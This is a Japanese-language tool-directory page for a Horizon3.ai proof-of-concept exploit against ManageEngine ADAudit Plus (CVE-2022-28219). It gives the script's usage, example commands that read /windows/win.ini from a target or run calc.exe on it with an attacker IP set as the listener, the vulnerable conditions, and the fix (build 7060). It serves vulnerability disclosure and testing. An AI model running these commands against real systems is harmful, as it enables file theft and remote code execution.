Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-28219 — ManageEngine ADAudit Plus CVE-2022-28219 の PoC | Kitploit
ツール/GitHubGitHub/horizon3ai/cve-2022-28219
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツール
GitHubhorizon3ai/cve-2022-28219

CVE-2022-28219

ManageEngine ADAudit Plus CVE-2022-28219 の PoC

リポジトリを見る
43154年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-28219

ManageEngine ADAudit Plus ビルド < 7060 に影響する CVE-2022-28219 の POC

技術分析

詳細は当社ブログをご覧ください: https://www.horizon3.ai/red-team-blog-cve-2022-28219

使用方法

root@kitploit:~
% python3 CVE-2022-28219.py -h
usage: CVE-2022-28219.py [-h] -t TARGET -l LHOST -d DOMAIN [-lhp HTTP_PORT] [-lfp FTP_PORT] [-f FILE] [-c COMMAND] [-u USER]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target URL with port
  -l LHOST, --lhost LHOST
                        local bind IP
  -d DOMAIN, --domain DOMAIN
                        fully qualified domain served by ADAudit Plus
  -lhp HTTP_PORT, --http-port HTTP_PORT
                        local HTTP port to bind to
  -lfp FTP_PORT, --ftp-port FTP_PORT
                        local FTP port to bind to
  -f FILE, --file FILE  get file or directory listing at given path, use forward slashes and don't include drive, e.g. /windows/win.ini or /users
  -c COMMAND, --command COMMAND
                        command to execute, e.g. calc.exe
  -u USER, --user USER  user running ADAudit Plus app, useful for finding upload file quickly
ツールをダウンロード

たとえば、c:\windows\win.ini ファイルを取得するには:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -f /windows/win.ini

または、ターゲット上で calc.exe を実行するには:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -c calc.exe

ファイル取得とRCEには、ManageEngine ADAudit Plus が Java ランタイム 8u121 以下で実行されている必要があります。ADAudit Plus に同梱されているデフォルトの Java ランタイムバージョンは 8u051 であるため、ほとんどの場合この条件が満たされます。

対策

ManageEngine ADAudit Plus ビルド 7060 以降 に更新してください。

最新のセキュリティ研究については、Twitter で Horizon3.ai Attack Team をフォローしてください:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

免責事項

このソフトウェアは、学術研究および効果的な防御技術の開発のみを目的として作成されたものであり、明示的に承認された場合を除き、システムへの攻撃に使用することを意図したものではありません。プロジェクトのメンテナーは、ソフトウェアの誤用について一切の責任を負いません。責任を持って使用してください。